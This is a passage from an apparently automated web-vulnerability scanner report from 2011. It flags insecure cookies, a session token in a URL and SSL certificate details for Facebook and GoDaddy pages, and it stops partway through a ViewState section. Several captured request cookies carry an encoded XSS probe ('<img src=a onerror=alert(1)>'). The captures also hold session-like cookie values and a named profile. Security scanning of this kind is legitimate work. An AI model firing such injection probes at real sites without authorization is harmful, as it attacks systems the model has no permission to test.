HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.185.122
X-Cnection: close
Date: Thu, 05 May 2011 12:38:10 GMT
Content-Length: 40951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

6.7. https://www.facebook.com/h02332 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/h02332

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

lsd=bnJmV; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h02332 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=bnJmV; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.166.47
X-Cnection: close
Date: Thu, 05 May 2011 12:37:53 GMT
Content-Length: 14457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.8. https://www.facebook.com/h02332 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/h02332

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h02332 HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; wd=1022x1007

Response

6.9. https://www.facebook.com/help/contact.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/help/contact.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/contact.php?show_form=cannot_identify&flow=pw_reset HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/recover.php?locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fterms.php%3Fref%3Dpf; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.189.113
X-Cnection: close
Date: Thu, 05 May 2011 11:44:19 GMT
Content-Length: 23828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.10. https://www.facebook.com/login.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/login.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 10:56:57 GMT; path=/; domain=.facebook.com; httponly
reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 10:56:57 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.31.128
Connection: close
Date: Thu, 05 May 2011 10:56:57 GMT
Content-Length: 16087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.11. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/pages/ToP-SeCNeT/195242630519520

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

lsd=Mkkns; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/ToP-SeCNeT/195242630519520 HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

6.12. https://www.facebook.com/pages/create.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/pages/create.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/create.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.22.122
Connection: close
Date: Thu, 05 May 2011 10:56:57 GMT
Content-Length: 32123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.13. https://www.facebook.com/r.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/r.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.14. https://www.facebook.com/recover.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/recover.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

_e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=1304595854; path=/; domain=.facebook.com
reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US; path=/; domain=.facebook.com
W=1304595854; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /recover.php?locale=en_US HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
Referer: http://www.facebook.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fpage%3D432; act=1304613672018%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613672031%2C%22act%22%2C1304613672018%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Flogin.php%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C482%2C422%2C0%2C1006%2C16%5D; wd=1022x1007

Response

6.15. https://www.godaddy.com/gdshop/hosting/landing.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/gdshop/hosting/landing.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
traffic=referringdomain=&referringpath=&shopper=&querystring=&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/hosting/landing.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.16. https://www.godaddy.com/gdshop/registrar/search.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/gdshop/registrar/search.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/registrar/search.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html; Charset=utf-8
Expires: Thu, 28 Apr 2011 12:17:24 GMT
Location: https://www.godaddy.com/domains/search.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=FJIOEHOAAMMALPNOAONKBPHB; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:23 GMT
Connection: close

6.17. https://www.godaddy.com/gdshop/website.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/gdshop/website.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/website.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:25 GMT
Location: https://www.godaddy.com/hosting/website-builder.aspx?app%5Fhdr=
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=JJIOEHOAFBGIEMIAKMJJFOAB; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:24 GMT
Connection: close

7. Session token in URL previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.facebook.com/extern/login_status.php?api_key=132151116822711&app_id=132151116822711&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df12aabd56%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13c0616c4%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df23792e5e8%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d6b0d054%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df24e5b0ab%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec&sdk=joey&session_version=3

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /extern/login_status.php?api_key=132151116822711&app_id=132151116822711&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df12aabd56%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13c0616c4%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df23792e5e8%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d6b0d054%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df24e5b0ab%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.115.59
X-Cnection: close
Date: Thu, 05 May 2011 00:57:31 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.

8. SSL certificate previous next
There are 4 instances of this issue:

https://www.facebook.com/
https://www.fightmagazine.com/
https://www.godaddy.com/
https://www.neodata.com/

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

8.1. https://www.facebook.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not trusted.

The server presented the following certificates:

Server certificate

Issued to:	www.facebook.com
Issued by:	DigiCert High Assurance CA-3
Valid from:	Sun Nov 14 18:00:00 CST 2010
Valid to:	Mon Dec 02 17:59:59 CST 2013

Certificate chain #1

Issued to:	DigiCert High Assurance CA-3
Issued by:	DigiCert High Assurance EV Root CA
Valid from:	Mon Apr 02 19:00:00 CDT 2007
Valid to:	Sat Apr 02 19:00:00 CDT 2022

Certificate chain #2

Issued to:	DigiCert High Assurance EV Root CA
Issued by:	Entrust.net Secure Server Certification Authority
Valid from:	Sun Oct 01 00:00:00 CDT 2006
Valid to:	Sat Jul 26 13:15:15 CDT 2014

Certificate chain #3

Issued to:	Entrust.net Secure Server Certification Authority
Issued by:	Entrust.net Secure Server Certification Authority
Valid from:	Tue May 25 11:09:40 CDT 1999
Valid to:	Sat May 25 11:39:40 CDT 2019

8.2. https://www.fightmagazine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.fightmagazine.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.fightmagazine.com
Issued by:	Thawte SSL CA
Valid from:	Mon Apr 04 19:00:00 CDT 2011
Valid to:	Thu May 03 18:59:59 CDT 2012

Certificate chain #1

Issued to:	Thawte SSL CA
Issued by:	thawte Primary Root CA
Valid from:	Sun Feb 07 18:00:00 CST 2010
Valid to:	Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:	thawte Primary Root CA
Issued by:	Thawte Premium Server CA
Valid from:	Thu Nov 16 18:00:00 CST 2006
Valid to:	Wed Dec 30 17:59:59 CST 2020

Certificate chain #3

Issued to:	Thawte Premium Server CA
Issued by:	Thawte Premium Server CA
Valid from:	Wed Jul 31 19:00:00 CDT 1996
Valid to:	Fri Jan 01 17:59:59 CST 2021

8.3. https://www.godaddy.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.GoDaddy.com
Issued by:	Go Daddy Secure Certification Authority
Valid from:	Tue Jan 04 10:21:18 CST 2011
Valid to:	Mon Jan 14 16:28:36 CST 2013

Certificate chain #1

Issued to:	Go Daddy Secure Certification Authority
Issued by:	Go Daddy Class 2 Certification Authority
Valid from:	Wed Nov 15 19:54:37 CST 2006
Valid to:	Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:	Go Daddy Class 2 Certification Authority
Issued by:	Go Daddy Class 2 Certification Authority
Valid from:	Tue Jun 29 12:06:20 CDT 2004
Valid to:	Thu Jun 29 12:06:20 CDT 2034

8.4. https://www.neodata.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.neodata.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.neodata.com
Issued by:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:	Mon Aug 17 19:00:00 CDT 2009
Valid to:	Sun Sep 04 18:59:59 CDT 2011

Certificate chain #1

Issued to:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Wed Apr 16 19:00:00 CDT 1997
Valid to:	Mon Oct 24 18:59:59 CDT 2016

Certificate chain #2

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

9. ASP.NET ViewState without MAC enabled previous next
There are 5 instances of this issue:

http://www.bankrate.com/funnel/mortgages/
http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx
http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx
